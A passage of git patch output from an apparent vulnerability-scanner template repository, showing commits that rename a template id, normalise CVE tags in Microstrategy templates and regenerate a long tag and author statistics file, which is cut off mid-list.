https://www.exploit-db.com/exploits/47616 - tags: emerge,lfi + tags: cve,cve2019,emerge,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.80 From 8fa18933e97d239c46b79e26132a9c5d100dd586 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 16:20:24 +0530 Subject: [PATCH 2461/4083] id update --- cves/2018/CVE-2018-16836.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml index a7289fdaf2..472089aa4c 100644 --- a/cves/2018/CVE-2018-16836.yaml +++ b/cves/2018/CVE-2018-16836.yaml @@ -1,4 +1,4 @@ -id: rubedo-cms-directory-traversal +id: CVE-2018-16836 info: name: Rubedo CMS 3.4.0 - Directory Traversal From a98e8defc2c30c7a480ba5a0c5d64f6cd6f65738 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 16:22:53 +0530 Subject: [PATCH 2462/4083] misc update --- cves/2018/CVE-2018-18775.yaml | 2 +- cves/2018/CVE-2018-18777.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-18775.yaml b/cves/2018/CVE-2018-18775.yaml index 0682784ee0..2325ca6d23 100644 --- a/cves/2018/CVE-2018-18775.yaml +++ b/cves/2018/CVE-2018-18775.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter severity: medium - tags: cve,2018,microstrategy,xss + tags: cve,cve2018,microstrategy,xss reference: https://www.exploit-db.com/exploits/45755 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml index 8745a1add1..b0b5a72de4 100644 --- a/cves/2018/CVE-2018-18777.yaml +++ b/cves/2018/CVE-2018-18777.yaml @@ -9,7 +9,7 @@ info: allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. reference: https://www.exploit-db.com/exploits/45755 - tags: cve,2018,microstrategy,lfi + tags: cve,cve2018,microstrategy,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.30 From 7924f50a55c3b4cc48066485e483127c72d6eefc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 Sep 2021 10:54:22 +0000 Subject: [PATCH 2463/4083] Auto Generated Templates Stats [Tue Sep 21 10:54:22 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1540 +++++++++++++++++++++--------------------- TOP-10.md | 6 +- 3 files changed, 774 insertions(+), 774 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 1ddab0704d..b20b347a30 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":719},{"name":"lfi","count":258},{"name":"panel","count":248},{"name":"xss","count":244},{"name":"exposure","count":231},{"name":"wordpress","count":222},{"name":"rce","count":198},{"name":"tech","count":181},{"name":"cve2020","count":164},{"name":"wp-plugin","count":149},{"name":"cve2021","count":126},{"name":"cve2019","count":95},{"name":"config","count":94},{"name":"cve2018","count":82},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":53},{"name":"cve2017","count":49},{"name":"file","count":46},{"name":"unauth","count":46},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":23},{"name":"misc","count":23},{"name":"disclosure","count":21},{"name":"auth-bypass","count":20},{"name":"generic","count":20},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"router","count":19},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"cve2014","count":18},{"name":"debug","count":18},{"name":"misconfig","count":18},{"name":"php","count":16},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"cve2012","count":14},{"name":"cve2011","count":14},{"name":"adobe","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"dns","count":13},{"name":"devops","count":13},{"name":"aws","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"intrusive","count":9},{"name":"ruijie","count":8},{"name":"scada","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"cms","count":7},{"name":"backup","count":7},{"name":"ibm","count":7},{"name":"google","count":7},{"name":"vmware","count":7},{"name":"coldfusion","count":7},{"name":"microsoft","count":7},{"name":"netgear","count":7},{"name":"files","count":7},{"name":"confluence","count":7},{"name":"cve2009","count":7},{"name":"kubernetes","count":7},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"cve2008","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"java","count":5},{"name":"deserialization","count":5},{"name":"jolokia","count":5},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"nodejs","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"fileupload","count":5},{"name":"git","count":4},{"name":"zabbix","count":4},{"name":"moodle","count":4},{"name":"webserver","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"elastic","count":4},{"name":"exchange","count":4},{"name":"vpn","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"resin","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"buffalo","count":4},{"name":"firmware","count":4},{"name":"glpi","count":4},{"name":"grafana","count":4},{"name":"crlf","count":4},{"name":"strapi","count":4},{"name":"wso2","count":4},{"name":"symantec","count":4},{"name":"artifactory","count":4},{"name":"proxy","count":4},{"name":"samsung","count":4},{"name":"hp","count":4},{"name":"symfony","count":4},{"name":"zimbra","count":4},{"name":"magmi","count":4},{"name":"camera","count":3},{"name":"r-seenet","count":3},{"name":"nosqli","count":3},{"name":"oa","count":3},{"name":"bypass","count":3},{"name":"cacti","count":3},{"name":"ebs","count":3},{"name":"druid","count":3},{"name":"openssh","count":3},{"name":"jellyfin","count":3},{"name":"opensis","count":3},{"name":"bigip","count":3},{"name":"mail","count":3},{"name":"smtp","count":3},{"name":"linkerd","count":3},{"name":"mongodb","count":3},{"name":"nexus","count":3},{"name":"httpd","count":3},{"name":"springcloud","count":3},{"name":"nacos","count":3},{"name":"backups","count":3},{"name":"log","count":3},{"name":"caucho","count":3},{"name":"bitrix","count":3},{"name":"fpd","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"slack","count":3},{"name":"tikiwiki","count":3},{"name":"telerik","count":3},{"name":"zhiyuan","count":3},{"name":"npm","count":3},{"name":"prometheus","count":3},{"name":"microstrategy","count":3},{"name":"kevinlab","count":3},{"name":"vbulletin","count":3},{"name":"itop","count":3},{"name":"firebase","count":3},{"name":"jeesns","count":3},{"name":"hoteldruid","count":3},{"name":"ofbiz","count":3},{"name":"injection","count":3},{"name":"terramaster","count":3},{"name":"kibana","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"kafka","count":3},{"name":"amazon","count":3},{"name":"openam","count":3},{"name":"emerge","count":2},{"name":"wordfence","count":2},{"name":"status","count":2},{"name":"wuzhicms","count":2},{"name":"splunk","count":2},{"name":"favicon","count":2},{"name":"liferay","count":2},{"name":"waf","count":2},{"name":"activemq","count":2},{"name":"yii","count":2},{"name":"seeyon","count":2},{"name":"spark","count":2},{"name":"hpe","count":2},{"name":"akkadian","count":2},{"name":"cve2005","count":2},{"name":"netis","count":2},{"name":"showdoc","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"service","count":2},{"name":"horde","count":2},{"name":"vrealize","count":2},{"name":"jboss","count":2},{"name":"keycloak","count":2},{"name":"pega","count":2},{"name":"webcam","count":2},{"name":"guacamole","count":2},{"name":"sitecore","count":2},{"name":"odoo","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"mida","count":2},{"name":"igs","count":2},{"name":"manageengine","count":2},{"name":"ilo","count":2},{"name":"huawei","count":2},{"name":"geowebserver","count":2},{"name":"trixbox","count":2},{"name":"node","count":2},{"name":"backdoor","count":2},{"name":"axis","count":2},{"name":"kentico","count":2},{"name":"yapi","count":2},{"name":"prestashop","count":2},{"name":"phpcollab","count":2},{"name":"globalprotect","count":2},{"name":"rockmongo","count":2},{"name":"github","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"bruteforce","count":2},{"name":"ec2","count":2},{"name":"frp","count":2},{"name":"sonarqube","count":2},{"name":"axis2","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chiyu","count":2},{"name":"hostheader-injection","count":2},{"name":"shellshock","count":2},{"name":"oauth","count":2},{"name":"mcafee","count":2},{"name":"jeedom","count":2},{"name":"saltstack","count":2},{"name":"dos","count":2},{"name":"maian","count":2},{"name":"xxljob","count":2},{"name":"ucmdb","count":2},{"name":"netsweeper","count":2},{"name":"sharepoint","count":2},{"name":"nagios","count":2},{"name":"prtg","count":2},{"name":"totemomail","count":2},{"name":"paloalto","count":2},{"name":"cve2007","count":2},{"name":"nextjs","count":2},{"name":"cache","count":2},{"name":"avantfax","count":2},{"name":"linux","count":2},{"name":"grav","count":2},{"name":"hasura","count":2},{"name":"idrac","count":2},{"name":"couchdb","count":2},{"name":"adminer","count":2},{"name":"dolibarr","count":2},{"name":"middleware","count":2},{"name":"db","count":2},{"name":"kong","count":2},{"name":"chamilo","count":2},{"name":"ecology","count":2},{"name":"azure","count":2},{"name":"minio","count":2},{"name":"rstudio","count":2},{"name":"nextcloud","count":2},{"name":"voipmonitor","count":2},{"name":"leak","count":2},{"name":"openfire","count":2},{"name":"aruba","count":2},{"name":"bucket","count":2},{"name":"jsf","count":2},{"name":"icewarp","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"natshell","count":2},{"name":"hjtcloud","count":2},{"name":"sonicwall","count":2},{"name":"storage","count":2},{"name":"selea","count":1},{"name":"trane","count":1},{"name":"announcekit","count":1},{"name":"moinmoin","count":1},{"name":"opm","count":1},{"name":"razor","count":1},{"name":"lighttpd","count":1},{"name":"enumeration","count":1},{"name":"moin","count":1},{"name":"smartsense","count":1},{"name":"st","count":1},{"name":"subrion","count":1},{"name":"arl","count":1},{"name":"fortinet","count":1},{"name":"elascticsearch","count":1},{"name":"emby","count":1},{"name":"dotnet","count":1},{"name":"huijietong","count":1},{"name":"spectracom","count":1},{"name":"webadmin","count":1},{"name":"kafdrop","count":1},{"name":"twitter-server","count":1},{"name":"plc","count":1},{"name":"kubeflow","count":1},{"name":"plastic","count":1},{"name":"redcap","count":1},{"name":"burp","count":1},{"name":"wildfly","count":1},{"name":"nedi","count":1},{"name":"rockethchat","count":1},{"name":"opencast","count":1},{"name":"webftp","count":1},{"name":"clockwork","count":1},{"name":"fortigate","count":1},{"name":"karel","count":1},{"name":"panabit","count":1},{"name":"maxsite","count":1},{"name":"expressjs","count":1},{"name":"ilo4","count":1},{"name":"tamronos","count":1},{"name":"mirai","count":1},{"name":"szhe","count":1},{"name":"wing-ftp","count":1},{"name":"bolt","count":1},{"name":"skywalking","count":1},{"name":"dvr","count":1},{"name":"cerebro","count":1},{"name":"influxdb","count":1},{"name":"openvpn","count":1},{"name":"lotus","count":1},{"name":"hiawatha","count":1},{"name":"vidyo","count":1},{"name":"oscommerce","count":1},{"name":"socomec","count":1},{"name":"interlib","count":1},{"name":"apos","count":1},{"name":"netmask","count":1},{"name":"clockwatch","count":1},{"name":"ulterius","count":1},{"name":"nc2","count":1},{"name":"sar2html","count":1},{"name":"rdp","count":1},{"name":"servicedesk","count":1},{"name":"codeigniter","count":1},{"name":"thinkadmin","count":1},{"name":"opentsdb","count":1},{"name":"pacsone","count":1},{"name":"dotnetnuke","count":1},{"name":"krweb","count":1},{"name":"timeclock","count":1},{"name":"realteo","count":1},{"name":"avalanche","count":1},{"name":"olivetti","count":1},{"name":"xdcms","count":1},{"name":"acme","count":1},{"name":"chevereto","count":1},{"name":"mpsec","count":1},{"name":"centreon","count":1},{"name":"cyberoam","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"seacms","count":1},{"name":"salesforce","count":1},{"name":"haproxy","count":1},{"name":"domxss","count":1},{"name":"keenetic","count":1},{"name":"clink-office","count":1},{"name":"camunda","count":1},{"name":"pagespeed","count":1},{"name":"nexusdb","count":1},{"name":"mantis","count":1},{"name":"ricoh","count":1},{"name":"shopxo","count":1},{"name":"pcoip","count":1},{"name":"zookeeper","count":1},{"name":"weiphp","count":1},{"name":"beanshell","count":1},{"name":"empirecms","count":1},{"name":"acontent","count":1},{"name":"meraki","count":1},{"name":"pgadmin","count":1},{"name":"metinfo","count":1},{"name":"optiLink","count":1},{"name":"discord","count":1},{"name":"wondercms","count":1},{"name":"idemia","count":1},{"name":"craftcms","count":1},{"name":"elfinder","count":1},{"name":"beanstalk","count":1},{"name":"webmin","count":1},{"name":"sourcebans","count":1},{"name":"landray","count":1},{"name":"varnish","count":1},{"name":"sceditor","count":1},{"name":"viewpoint","count":1},{"name":"spring","count":1},{"name":"lansweeper","count":1},{"name":"xff","count":1},{"name":"gogs","count":1},{"name":"gateone","count":1},{"name":"whm","count":1},{"name":"avtech","count":1},{"name":"ruckus","count":1},{"name":"proftpd","count":1},{"name":"tor","count":1},{"name":"sqlite","count":1},{"name":"lg-nas","count":1},{"name":"etouch","count":1},{"name":"ems","count":1},{"name":"fastcgi","count":1},{"name":"daybyday","count":1},{"name":"wmt","count":1},{"name":"lanproxy","count":1},{"name":"glowroot","count":1},{"name":"chyrp","count":1},{"name":"visionhub","count":1},{"name":"oidc","count":1},{"name":"aura","count":1},{"name":" default-login","count":1},{"name":"ognl","count":1},{"name":"jenzabar","count":1},{"name":"bookstack","count":1},{"name":"zms","count":1},{"name":"visualtools","count":1},{"name":"solarlog","count":1},{"name":"achecker","count":1},{"name":"duomicms","count":1},{"name":"fortilogger","count":1},{"name":"scimono","count":1},{"name":"netgenie","count":1},{"name":"zarafa","count":1},{"name":"jsp","count":1},{"name":"addpac","count":1},{"name":"sage","count":1},{"name":"jquery","count":1},{"name":"wamp","count":1},{"name":"calendarix","count":1},{"name":"solman","count":1},{"name":"luftguitar","count":1},{"name":"crm","count":1},{"name":"eyelock","count":1},{"name":"robomongo","count":1},{"name":"fortiweb","count":1},{"name":"nuuo","count":1},{"name":"bullwark","count":1},{"name":"trilithic","count":1},{"name":"wifisky","count":1},{"name":"upnp","count":1},{"name":"sprintful","count":1},{"name":"lutron","count":1},{"name":"wiki","count":1},{"name":"mrtg","count":1},{"name":"dompdf","count":1},{"name":"tapestry","count":1},{"name":"mariadb","count":1},{"name":"commscope","count":1},{"name":"majordomo2","count":1},{"name":"jitsi","count":1},{"name":"circontrorl","count":1},{"name":"bash","count":1},{"name":"webui","count":1},{"name":"sql","count":1},{"name":"node-red-dashboard","count":1},{"name":"sidekiq","count":1},{"name":"javafaces","count":1},{"name":"panos","count":1},{"name":"glances","count":1},{"name":"graylog","count":1},{"name":"expn","count":1},{"name":"shopware","count":1},{"name":"websphere","count":1},{"name":"cors","count":1},{"name":"mailchimp","count":1},{"name":"k8","count":1},{"name":"octobercms","count":1},{"name":"rujjie","count":1},{"name":"shoppable","count":1},{"name":"bedita","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"payara","count":1},{"name":"servicenow","count":1},{"name":"ruby","count":1},{"name":"nimble","count":1},{"name":"blue-ocean","count":1},{"name":"metabase","count":1},{"name":"vnc","count":1},{"name":"upload","count":1},{"name":"rabbitmq","count":1},{"name":"redmine","count":1},{"name":"rhymix","count":1},{"name":"commax","count":1},{"name":"auth","count":1},{"name":"yachtcontrol","count":1},{"name":"h3c-imc","count":1},{"name":"cloudflare","count":1},{"name":"rsyncd","count":1},{"name":"cgi","count":1},{"name":"xvr","count":1},{"name":"chinaunicom","count":1},{"name":"nsasg","count":1},{"name":"gsoap","count":1},{"name":"lancom","count":1},{"name":"jeewms","count":1},{"name":"emc","count":1},{"name":"doh","count":1},{"name":"cocoon","count":1},{"name":"grails","count":1},{"name":"sophos","count":1},{"name":"tika","count":1},{"name":"jnoj","count":1},{"name":"fiori","count":1},{"name":"xiuno","count":1},{"name":"tracer","count":1},{"name":"nette","count":1},{"name":"xmlchart","count":1},{"name":"dotclear","count":1},{"name":"turbocrm","count":1},{"name":"javascript","count":1},{"name":"artica","count":1},{"name":"saltapi","count":1},{"name":"hiboss","count":1},{"name":"gitlist","count":1},{"name":"dnssec","count":1},{"name":"oneblog","count":1},{"name":"resourcespace","count":1},{"name":"elasticsearch","count":1},{"name":"feifeicms","count":1},{"name":"kyan","count":1},{"name":"swagger","count":1},{"name":"spip","count":1},{"name":"enum","count":1},{"name":"office365","count":1},{"name":"rubedo","count":1},{"name":"faraday","count":1},{"name":"appweb","count":1},{"name":"erp-nc","count":1},{"name":"sarg","count":1},{"name":"redis","count":1},{"name":"pihole","count":1},{"name":"owasp","count":1},{"name":"fedora","count":1},{"name":"dbeaver","count":1},{"name":"webmodule-ee","count":1},{"name":"xml","count":1},{"name":"soar","count":1},{"name":"cse","count":1},{"name":"sangfor","count":1},{"name":"rfi","count":1},{"name":"exacqvision","count":1},{"name":"netrc","count":1},{"name":"qsan","count":1},{"name":"phpfastcache","count":1},{"name":"phpunit","count":1},{"name":"minimouse","count":1},{"name":"biometrics","count":1},{"name":"pyramid","count":1},{"name":"email","count":1},{"name":"accela","count":1},{"name":"geutebruck","count":1},{"name":"powercreator","count":1},{"name":"gitea","count":1},{"name":"dom","count":1},{"name":"tidb","count":1},{"name":"vsphere","count":1},{"name":"zeroshell","count":1},{"name":"phpinfo","count":1},{"name":"kindeditor","count":1},{"name":"ntopng","count":1},{"name":"gunicorn","count":1},{"name":"gotmls","count":1},{"name":"acexy","count":1},{"name":"cherokee","count":1},{"name":"clickhouse","count":1},{"name":"gstorage","count":1},{"name":"jenkin","count":1},{"name":"flink","count":1},{"name":"sentry","count":1},{"name":"xunchi","count":1},{"name":"drone","count":1},{"name":"zte","count":1},{"name":"mobileiron","count":1},{"name":"scs","count":1},{"name":"portainer","count":1},{"name":"clave","count":1},{"name":"froxlor","count":1},{"name":"mara","count":1},{"name":"tieline","count":1},{"name":"woocomernce","count":1},{"name":"owa","count":1},{"name":"tileserver","count":1},{"name":"74cms","count":1},{"name":"anchorcms","count":1},{"name":"starttls","count":1},{"name":"opensmtpd","count":1},{"name":"extractor","count":1},{"name":"myucms","count":1},{"name":"hortonworks","count":1},{"name":"qvisdvr","count":1},{"name":"codemeter","count":1},{"name":"simplecrm","count":1},{"name":"aspnuke","count":1},{"name":"ewebs","count":1},{"name":"mongo","count":1},{"name":"openx","count":1},{"name":"linkedin","count":1},{"name":"jfrog","count":1},{"name":"iptime","count":1},{"name":"mysql","count":1},{"name":"bigbluebutton","count":1},{"name":"redhat","count":1},{"name":"fortigates","count":1},{"name":"traefik","count":1},{"name":"ghost","count":1},{"name":"blind","count":1},{"name":"bazarr","count":1},{"name":"ssl","count":1},{"name":"graphql","count":1},{"name":"azkaban","count":1},{"name":"plone","count":1},{"name":"gloo","count":1},{"name":"argussurveillance","count":1},{"name":"timesheet","count":1},{"name":"eprints","count":1},{"name":"smi","count":1},{"name":"b2evolution","count":1},{"name":"openstack","count":1},{"name":"exposures","count":1},{"name":"tcexam","count":1},{"name":"processmaker","count":1},{"name":"nordex","count":1},{"name":"klog","count":1},{"name":"api-manager","count":1},{"name":"plugin","count":1},{"name":"kerbynet","count":1},{"name":"gridx","count":1},{"name":"geddy","count":1},{"name":"cofax","count":1},{"name":"phalcon","count":1},{"name":"wazuh","count":1},{"name":"embedthis","count":1},{"name":"ecoa","count":1},{"name":"zmanda","count":1},{"name":"asus","count":1},{"name":"zzzcms","count":1},{"name":"monitorr","count":1},{"name":"opensns","count":1},{"name":"miscrsoft","count":1},{"name":"nifi","count":1},{"name":"k8s","count":1},{"name":"checkpoint","count":1},{"name":"centos","count":1},{"name":"listserv","count":1},{"name":"phpwiki","count":1},{"name":"alerta","count":1},{"name":"springframework","count":1},{"name":"frontpage","count":1},{"name":"expose","count":1},{"name":"omi","count":1},{"name":"rmc","count":1},{"name":"setup","count":1},{"name":"postgres","count":1},{"name":"openerp","count":1},{"name":"ssltls","count":1},{"name":"mautic","count":1},{"name":"database","count":1},{"name":"yealink","count":1},{"name":"floc","count":1},{"name":"cloudinary","count":1},{"name":"cobub","count":1},{"name":"s3","count":1},{"name":"spf","count":1},{"name":"exponentcms","count":1},{"name":"jaspersoft","count":1},{"name":"viewlinc","count":1},{"name":"tensorflow","count":1},{"name":"zenario","count":1},{"name":"werkzeug","count":1},{"name":"heroku","count":1},{"name":"esmtp","count":1},{"name":"shiro","count":1},{"name":"sgp","count":1},{"name":"cockpit","count":1},{"name":"zyxel","count":1},{"name":"goahead","count":1},{"name":"darkstat","count":1},{"name":"vsftpd","count":1},{"name":"memcached","count":1},{"name":"ioncube","count":1},{"name":"triconsole","count":1},{"name":"tenda","count":1},{"name":"graphite","count":1},{"name":"eyou","count":1},{"name":"couchbase","count":1},{"name":"javamelody","count":1},{"name":"nomad","count":1},{"name":"default","count":1},{"name":"eg","count":1},{"name":"basic-auth","count":1},{"name":"gespage","count":1},{"name":"smartblog","count":1},{"name":"tjws","count":1},{"name":"episerver","count":1},{"name":"mongoshake","count":1},{"name":"concrete","count":1},{"name":"qdpm","count":1},{"name":"iceflow","count":1},{"name":"ecom","count":1},{"name":"nweb2fax","count":1},{"name":"mdb","count":1},{"name":"openemr","count":1},{"name":"lotuscms","count":1},{"name":"maccmsv10","count":1},{"name":"ambari","count":1},{"name":"htmli","count":1},{"name":"nps","count":1},{"name":"parentlink","count":1},{"name":"wooyun","count":1},{"name":"sureline","count":1},{"name":"xampp","count":1},{"name":"wavlink","count":1},{"name":"mantisbt","count":1},{"name":"nuxeo","count":1},{"name":"gilacms","count":1},{"name":"sco","count":1},{"name":"shoretel","count":1},{"name":"csrf","count":1},{"name":"landrayoa","count":1},{"name":"blackboard","count":1},{"name":"totaljs","count":1},{"name":"linksys","count":1},{"name":"adb","count":1},{"name":"fastapi","count":1},{"name":"apiman","count":1},{"name":"tectuus","count":1},{"name":"phpfusion","count":1},{"name":"myvuehelp","count":1},{"name":"natemail","count":1},{"name":"shopizer","count":1},{"name":"tpshop","count":1},{"name":"openrestry","count":1},{"name":"magicflow","count":1},{"name":"bitly","count":1},{"name":"postmessage","count":1},{"name":"diris","count":1},{"name":"spidercontrol","count":1},{"name":"mediumish","count":1},{"name":"zcms","count":1},{"name":"cve2006","count":1},{"name":"ueditor","count":1},{"name":"circontrol","count":1},{"name":"websvn","count":1},{"name":"labtech","count":1},{"name":"stem","count":1},{"name":"redwood","count":1},{"name":"tensorboard","count":1},{"name":"livezilla","count":1},{"name":"pippoint","count":1},{"name":"ns","count":1},{"name":"terraform","count":1},{"name":"primetek","count":1},{"name":"hadoop","count":1},{"name":"rmi","count":1},{"name":"netdata","count":1},{"name":"alibaba","count":1},{"name":"wavemaker","count":1},{"name":"jmx","count":1},{"name":"monitorix","count":1},{"name":"vscode","count":1},{"name":"uwsgi","count":1},{"name":"zend","count":1},{"name":"actuator","count":1},{"name":"dvwa","count":1},{"name":"perl","count":1},{"name":"finereport","count":1},{"name":"clusterengine","count":1},{"name":"discourse","count":1},{"name":"rocketchat","count":1},{"name":"zm","count":1},{"name":"tongda","count":1},{"name":"alertmanager","count":1},{"name":"svn","count":1},{"name":"comodo","count":1},{"name":"svnserve","count":1},{"name":"logontracer","count":1},{"name":"pmb","count":1},{"name":"ganglia","count":1},{"name":"synnefo","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":258},{"name":"daffainfo","count":213},{"name":"pdteam","count":196},{"name":"geeknik","count":152},{"name":"dwisiswant0","count":131},{"name":"gy741","count":72},{"name":"pussycat0x","count":65},{"name":"madrobot","count":61},{"name":"princechaddha","count":61},{"name":"gaurang","count":42},{"name":"0x_akoko","count":37},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"righettod","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"dogasantos","count":7},{"name":"meme-lord","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"skeltavik","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"emenalf","count":3},{"name":"unstabl3","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"johnk3r","count":3},{"name":"sushantkamble","count":3},{"name":"mavericknerd","count":3},{"name":"shine","count":3},{"name":"f1tz","count":3},{"name":"jarijaas","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"0w4ys","count":3},{"name":"idealphase","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"vsh00t","count":3},{"name":"dudez","count":3},{"name":"fyoorer","count":3},{"name":"random-robbie","count":2},{"name":"0xelkomy","count":2},{"name":"convisoappsec","count":2},{"name":"alifathi-h1","count":2},{"name":"x1m_martijn","count":2},{"name":"johnjhacking","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"0xsapra","count":2},{"name":"kiblyn11","count":2},{"name":"0xsmiley","count":2},{"name":"0xprial","count":2},{"name":"ree4pwn","count":2},{"name":"parth","count":2},{"name":"amsda","count":2},{"name":"arcc","count":2},{"name":"zomsop82","count":2},{"name":"lotusdll","count":2},{"name":"nkxxkn","count":2},{"name":"udit_thakkur","count":2},{"name":"huowuzhao","count":2},{"name":"0xcrypto","count":2},{"name":"gevakun","count":2},{"name":"afaq","count":2},{"name":"r3naissance","count":2},{"name":"bernardofsr","count":2},{"name":"joeldeleep","count":2},{"name":"cocxanh","count":2},{"name":"vavkamil","count":2},{"name":"gal nagli","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"pxmme1337","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"g4l1t0","count":2},{"name":"ehsahil","count":2},{"name":"socketz","count":2},{"name":"swissky","count":2},{"name":"hahwul","count":2},{"name":"koti2","count":2},{"name":"foulenzer","count":2},{"name":"davidmckennirey","count":2},{"name":"randomrobbie","count":2},{"name":"mohammedsaneem","count":2},{"name":"whoever","count":2},{"name":"moritz nentwig","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bing0o","count":2},{"name":"hetroublemakr","count":2},{"name":"fabaff","count":2},{"name":"manuelbua","count":1},{"name":"thezakman","count":1},{"name":"zhenwarx","count":1},{"name":"th3.d1p4k","count":1},{"name":"adrianmf","count":1},{"name":"taielab","count":1},{"name":"chron0x","count":1},{"name":"_harleo","count":1},{"name":"flag007","count":1},{"name":"pudsec","count":1},{"name":"intx0x80","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"mass0ma","count":1},{"name":"sullo","count":1},{"name":"tim_koopmans","count":1},{"name":"schniggie","count":1},{"name":"regala_","count":1},{"name":"andirrahmani1","count":1},{"name":"j33n1k4","count":1},{"name":"deena","count":1},{"name":"jteles","count":1},{"name":"akshansh","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"kurohost","count":1},{"name":"geraldino2","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"c3l3si4n","count":1},{"name":"wabafet","count":1},{"name":"yashgoti","count":1},{"name":"ringo","count":1},{"name":"pratik 